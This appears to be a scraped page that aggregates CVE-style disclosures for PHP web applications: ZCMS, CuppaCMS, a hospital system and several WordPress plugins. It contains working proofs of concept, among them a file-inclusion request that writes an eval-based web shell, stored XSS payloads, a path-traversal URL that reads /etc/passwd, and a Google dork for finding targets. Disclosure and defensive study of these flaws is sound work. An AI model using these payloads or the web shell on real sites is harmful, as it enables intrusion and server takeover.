ZCMS v20170206 was discovered to contain a file inclusion vulnerability via index.php?m=home&c=home&a=sp_set_config.

Permalink

Cannot retrieve contributors at this time

There is a file inclusion vulnerability here: index.php?m=home&c=home&a=sp\_set\_config

Vulnerability file：\\Application\\Home\\Controller\\HomeController.class.php

The vulnerability code is as follows:

You can see that the incoming file is directly included here, and the file is not filtered

.....................................................

function sp\_set\_config($file,$config\_array){

if (is\_writable($file)) {

$config = require $file;

$config\_content = array\_merge($config, $config\_array);

file\_put\_contents($file, "<?php \\nreturn " . stripslashes(var\_export($config\_content, true)) . ";", LOCK\_EX);

}

.....................................................

Vulnerability to reproduce:

1、First create a 1.txt file in the root directory of the website，of course, this can be any file in the root directory of the website

2、The code in the 1.txt file is as follows:

<?php phpinfo();?> <?php fputs(fopen('shell.php','w'),'<?php @eval($\_POST\[cmd\]); ?>'); ?>

3、Visit url: http://www.xxx.com/index.php?m=home&c=home&a=sp\_set\_config ，use the post method to pass in $file and $config\_array

The poc is as follows:

.................................................................................................

POST /index.php?m=home&c=home&a=sp\_set\_config HTTP/1.1

Host: www.xiaodi.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

DNT: 1

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 27

file=1.txt&config\_array=xxx

................................................................................................

4、You can see that shell.php is successfully generated in the root directory of the website

Repair suggestion:

1、Restrict incoming files to php suffix

2、Specifies the incoming filename

3、Detect and filter the content of incoming files

CVE-2022-28521: bug_report/zcms：php file inclusion at main · zhendezuile/bug_report

Unauthenticated Cross-Site Scripting (XSS) vulnerability in Tripetto's Tripetto plugin <= 5.1.4 on WordPress via SVG image upload.

CVE-2021-36895: WordPress form builder plugin for contact forms, surveys and quizzes – Tripetto

CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-27985: SQL injection vulnerability exists in CuppaCMS /administrator/alerts/alertLightbox.php · Issue #31 · CuppaCMS/CuppaCMS

Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the component room.php.

**Here is a sql injection in room.php**

**Vulnerability page is is as follows**  
![image](https://user-images.githubusercontent.com/52986105/158118493-cce2b997-9e56-4435-838c-94bc80598a34.png)  
**if I submit the request,Vulnerability in many parameters**  
![image](https://user-images.githubusercontent.com/52986105/158122200-54538a55-05fe-470d-8864-cb819c8bb483.png)

****the sqlmap result****

![image](https://user-images.githubusercontent.com/52986105/158119620-cdb2870d-ceea-4abb-95a3-51ba89f28fc3.png)  
![image](https://user-images.githubusercontent.com/52986105/158122360-faf82b53-63a6-4e30-b231-0a88b7b41a81.png)  
![image](https://user-images.githubusercontent.com/52986105/158122395-305c2a92-a682-484e-98f0-819c22803ceb.png)  
![image](https://user-images.githubusercontent.com/52986105/158122964-4191d45a-f65f-4543-87a1-a0080515fc9d.png)  
![image](https://user-images.githubusercontent.com/52986105/158123278-5d8c851b-5607-4df7-ac06-b2f4eebbf838.png)

CVE-2022-27299: SQL injection vulnerability · Discussion #14 · kabirkhyrul/HMS

CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php.

CVE-2022-27984: SQL injection vulnerability exists in CuppaCMS /administrator/templates/default/html/windows/right.php · Issue #30 · CuppaCMS/CuppaCMS

WordPress Coru LFMember plugin version 1.0.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin Coru LFMember - Stored Cross SiteScripting# Date: 26-04-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/Coru LFMember/# Version: 1.0.2# Tested on: Firefox# Contact me: mariamtariq404@gmail.com# Vulnerable Code:```<td class="manage-column"><input type="text" value="<?php print$result['game_image'] ?>" name="game_image[]" /></td><td class="manage-column"><?php printstripslashes($result['game_name_short']) ?></td><td class="manage-column"><input type="text" value="<?php printstripslashes($result['game_name_long']) ?>" name="game_name_long[]" /></td><td class="manage-column"><textarea name="game_description[]" rows="4"cols="10"><?php print stripslashes($result['game_description'])?></textarea></td><td class="manage-column"><input type="text" value="<?php print$result['game_link'] ?>" name="game_link[]" /></td>```# POC1. Install the Coru LFMember WordPress plugin and activate it.2. Go to LFMember -> Add New and inject XSS payload “><img src=xonerror=alert(1)> in the fields given i.e, Game Image Name, Game ShortName, Game Long Name, Game Description, and Links to.3. XSS will trigger and will be stored.## POC Imagehttps://imgur.com/kZDtIVz

WordPress Coru LFMember 1.0.2 Cross Site Scripting

WordPress WP-Invoice plugin version 4.3.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin  WP-Invoice - Stored Cross Site Scripting# Date: 25-04-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/WP-Invoice/# Version: 4.3.1# Tested on: Firefox# Contact me: mariamtariq404@gmail.com# Vulnerable Code:``` wpi.business_name = '<?php echo ($wpi_settings['business_name']); ?>';``# POC1.  Install the WP-Invoice WordPress plugin and activate it.2. Go to WP-Invoice settings  and inside the Business Name field inject XSSpayload “><img src=x onerror=alert(1)>3. XSS will trigger and will be stored.## POC Imagehttps://imgur.com/rsHIEO9

WordPress WP-Invoice 4.3.1 Cross Site Scripting

Plugin Settings Update vulnerability in ShortPixel's ShortPixel Adaptive Images plugin <= 3.3.1 at WordPress allows an attacker with a low user role like a subscriber or higher to change the plugin settings.

CVE-2022-29417: ShortPixel Adaptive Images – WebP, AVIF, CDN, Image Optimization

The flo-launch WordPress plugin before 2.4.1 injects code into wp-config.php when creating a cloned site, allowing any attacker to initiate a new site install by setting the flo_custom_table_prefix cookie to an arbitrary value.

CVE-2022-0541

The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.

    # Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - LocalFile Inclusion - Unauthenticated# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/# Date: 29-03-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/# Version: 1.0.3# Tested on: Firefox# Contact me: h [at] spidersilk.com# Vulnerable File: tblight.php# Vulnerable Code:```if(!empty($_GET['controller']) && !empty($_GET['action']) &&!empty($_GET['ajax']) && $_GET['ajax'] == 1){    require_once('' . 'controllers/'.$_GET['controller'].'.php');}```# Proof of concept:http://localhost:10003//wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1<http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1># POC image:https://prnt.sc/9O8_akDp2HPC

Tag

#php